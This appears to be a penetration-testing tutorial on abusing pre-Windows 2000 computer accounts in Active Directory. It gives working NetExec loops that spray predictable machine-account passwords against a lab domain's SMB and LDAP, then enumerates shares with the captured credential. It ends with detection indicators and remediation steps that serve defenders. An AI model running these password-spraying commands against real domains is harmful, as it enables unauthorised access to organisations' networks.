Pre-Windows 2000 compatible computer account abuse targets old or pre-created machine accounts with predictable passwords.
The classic pattern is:
username: COMPUTER$
password: computer
This is not common in hardened environments, but it is a fast check when machine names are known.
Build Computer List
From DNS or scan results:
cat > computers.txt <<'EOF'
OOTW-DC01
OOTW-WS01
OOTW-SRV01
EOF
Normalize:
cat computers.txt | tr '[:lower:]' '[:upper:]' | sort -u > computers-upper.txt
Test Machine Account Defaults
while read c; do
pass=$(echo "$c" | tr '[:upper:]' '[:lower:]')
nxc smb 10.10.10.200 -d ootw.local -u "${c}$" -p "$pass" --continue-on-success
done < computers-upper.txt
Example:
nxc smb 10.10.10.200 -d ootw.local -u 'OOTW-WS01$' -p 'ootw-ws01'
Success:
[+] ootw.local\OOTW-WS01$:ootw-ws01
Validate As Machine Account
nxc ldap 10.10.10.200 -d ootw.local -u 'OOTW-WS01$' -p 'ootw-ws01'
nxc smb 10.10.10.200 -d ootw.local -u 'OOTW-WS01$' -p 'ootw-ws01' --shares
Machine accounts end with $. Quote the username so the shell does not treat $ specially.
Detection
Defenders look for:
- authentication attempts where
TargetUserNameends with$ - failed NTLM or Kerberos logons for many computer accounts
- successful machine account logon from non-machine source IPs
- Security 4624, 4625, 4771, and 4776 patterns
Remediation
- disable or remove stale pre-created computer accounts
- randomize machine account passwords immediately
- set
ms-DS-MachineAccountQuotato0where appropriate - monitor machine account logons from unexpected hosts
- do not leave prestaged machines unused